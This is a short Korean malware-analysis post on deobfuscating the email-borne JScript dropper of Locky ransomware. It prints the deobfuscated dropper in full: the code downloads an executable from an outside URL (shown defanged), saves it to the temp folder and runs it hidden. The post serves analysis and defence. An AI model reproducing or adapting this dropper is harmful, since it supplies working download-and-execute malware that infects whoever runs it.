[Locky 랜섬웨어/Locky Ransomware] Dropper 난독화 스크립트 복호화 / Script Deobfuscation

* 서론

이메일을 통해 배포되는 스크립트는 난독화(Obfuscation)이 되어있다.

난독화 수준이 어렵지 않아 금방 해독 할 수 있다.

난독화 수준은 문자열이 변수로 치환되어있는 수준밖에 안되서 하나하나씩 바꿔가면서 풀 수 있다. (수동적인 방법이 싫다면 좀더 능동적인 방법이 있지만..)

보통 아래의 샘플같이 작성되어있고 URL만 바꿔서 배포된다.

* 코드

WshShell = WScript["CreateObject"]("WScript.Shell");
filepath = WshShell["ExpandEnvironmentStrings"]("%TEMP%/") + "BEEj10nQLFPynvY.exe";

http = WScript.CreateObject("MSXML2.XMLHTTP");
http.open("GET", "http://www[.]liveshowgirl[.]com/8i5ju4g34", false);
http.send();
while (http.readystate < 4)
{
 WScript.Sleep(1000)
};

stream = WScript["CreateObject"]("ADODB.Stream");
stream.open();
stream.type = 1;
stream.write(http.ResponseBody);
stream.position = 0;
stream.SaveToFile(filepath, 2);
stream.close();

WshShell["Run"](filepath, 0, 0);

BLDwYbnwPsgitOR = "asd;lfkjaosdfau7hgsd8fa7ogsdfyauhisdf724";
DXLHOmBhsgs = "asd;lfkjaosdfau7hgsd8fa7ogsdfyauhisdf533";
vmrCGhXWnUP = "asd;lfkjaosdfau7hgsd8fa7ogsdfyauhisdf1003";